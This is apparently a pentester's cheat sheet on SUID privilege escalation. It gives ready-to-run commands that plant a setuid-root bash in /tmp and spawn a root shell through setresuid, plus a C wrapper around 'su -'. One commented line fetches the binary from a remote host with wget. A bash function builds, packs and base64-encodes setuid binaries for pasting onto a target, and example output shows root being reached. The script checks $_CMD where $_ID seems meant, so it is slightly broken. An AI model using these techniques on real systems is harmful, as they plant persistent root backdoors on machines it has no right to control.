####
SUID
####

****
bash
****

| Abusing unstable root access or EUID to create a suid bash

.. code-block:: bash

  # As root
  cp /bin/bash /tmp/bash
  chown root:root /tmp/bash
  chmod 4777 /tmp/bash

  # As user
  /tmp/bash -p -c 'python3 -c "import pty,os;os.setresuid(0,0,0);pty.spawn(\"/bin/bash\")"'

|

******
Manual
******

| Abusing effective UID (EUID) to run su as root

.. code-block:: bash

  cat <<'EOF'|tee /tmp/su.c
  #include <stdlib.h>
  #include <unistd.h>
  int main() {
  setresuid(0, 0, 0);
  system("su -");
  return 0;
  }
  EOF
  # Static build
  gcc -static  -static-libgcc -static-libstdc++ -O0 -g -o /tmp/suidsu /tmp/su.c -m64
  sudo cp /tmp/suidsu /var/www/html/suidsu
  # wget 1.2.3.4/suidsu -O /tmp/suidsu
  # /tmp/bash -p -c /tmp/suidsu

  # Or direct build on target env
  # gcc -O0 -g -o /tmp/suidsu /tmp/su.c -m64

|

******
Script
******

| Abusing EUID

.. code-block:: bash

  # Bash function

  setuid() {
  CMD="$1"
  _ID="$2"
  ARCH="$3"
  if [ -z "$CMD"  ] ; then CMD="bash" ; fi
  if [ -z "$_ID"   ] ; then _ID="geteuid()"     ; fi
  if [ -z "$ARCH" ] ; then ARCH="64"  ; fi

  if [ "$_ID" != "geteuid()" ] ; then
    TMPNAME="/tmp/SETUID-$ARCH-$_ID-$(echo $CMD | md5sum | cut -d ' ' -f1)"
  else
    TMPNAME="/tmp/SETUID-$ARCH-EUID-$(echo $CMD | md5sum | cut -d ' ' -f1)"
  fi

  C="#include <stdlib.h>
  #include <unistd.h>
  int main() {
  setresuid($_ID, $_ID, $_ID);
  system(\"$CMD\");
  return 0;
  }"

  echo -e "$C" > ${TMPNAME}.c
  gcc -static  -static-libgcc -static-libstdc++ -O0 -g -o $TMPNAME.static ${TMPNAME}.c -m${ARCH}
  upx $TMPNAME.static
  gcc -O0 -g -o $TMPNAME ${TMPNAME}.c -m${ARCH}

  OUTPUT="\necho '$(cat $TMPNAME | gzip | base64 -w0)'|base64 -d|gzip -d>$TMPNAME"
  echo -e "$OUTPUT"

  if [ "$_CMD" == "geteuid()" ] ; then echo -e "
  chown ${_ID}:${_ID} $TMPNAME
  chmod 4777  $TMPNAME
  " ; fi
  
  ls -ltrh $TMPNAME

  }


| Paste function in terminal or add it to your bashrc, don't mind the "setresuid" warning on compilation.
| setuid bash function also send outputfile to clipboard, just paste content to target terminal and apply user/perms.
| output:

.. code-block:: bash

  (user1)$ setuid whoami 0 64
  [..]
  echo 'RESULTBASE64'|base64 -d|gzip -d>/tmp/SETUID-64-0-whoami

  # With target user on target env:
  chown 0 /tmp/SETUID-64-0-whoami
  chmod 4777 /tmp/SETUID-64-0-whoami

  -rwxrwxr-x 1 user1 user1 18K [..] /tmp/SETUID-64-0-whoami

| Exemple:

.. code-block:: bash

  # Usage: setuid COMMAND USERID x64/32
  # Let's try to export root access (id 0)
  (user1)$ setuid whoami 0 64

  # Can't use root yet
  (user1)$ /tmp/SETUID-64-0-whoami
  user1

  # Use target(root) account to apply SUID permission
  (root)$ chown root: /tmp/SETUID-64-0-whoami && chmod 4755 /tmp/SETUID-64-0-whoami

  # Get back to user1 and try the SUID whoami
  (user1)$ /tmp/SETUID-64-0-whoami
  root




